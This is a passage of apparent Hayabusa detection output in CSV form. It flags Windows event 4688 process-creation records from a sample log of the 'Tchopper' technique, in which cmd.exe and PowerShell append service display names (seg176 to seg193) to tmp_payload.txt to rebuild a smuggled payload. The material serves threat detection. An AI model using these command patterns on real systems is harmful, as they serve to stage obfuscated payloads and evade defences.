0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:41.996 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:43.437 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg176"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6b8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:43.437 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg176"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe70 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:43.437 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:44.878 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg177"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xce0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:44.893 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg177"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xff4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:44.893 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:46.331 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg178"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe20 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:46.331 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg178"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd00 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:46.331 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:47.818 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg179"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xab4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:47.818 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg179"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc64 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:47.818 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:49.273 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg180"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc88 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:49.273 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg180"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x1dc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:49.273 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:50.726 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg181"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd08 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:50.742 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg181"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbc8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:50.742 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:52.180 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg182"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xee8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:52.180 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg182"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcb4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:52.180 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:53.645 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg183"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:53.645 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg183"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:53.645 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:55.099 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg184"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x7c0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:55.114 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg184"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfd4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:55.114 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:56.538 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg185"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x990 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:56.554 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg185"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe4c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:56.554 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:58.007 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg186"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:58.007 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg186"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbc4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:58.007 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:59.462 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg187"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x750 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:59.462 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg187"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x324 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:59.462 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:00.900 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg188"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xcec | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:00.900 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg188"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x470 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:00.900 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:02.337 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg189"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x490 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:02.337 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg189"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb1c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:02.337 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:03.788 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg190"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xaf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:03.788 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg190"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfe4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:03.788 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:05.256 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg191"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x474 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:05.256 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg191"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xabc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:05.256 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:06.713 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg192"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xb14 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:06.728 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg192"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x61c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:06.728 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:08.194 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg193"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd30 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:08.194 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg193"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x1dc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:08.194 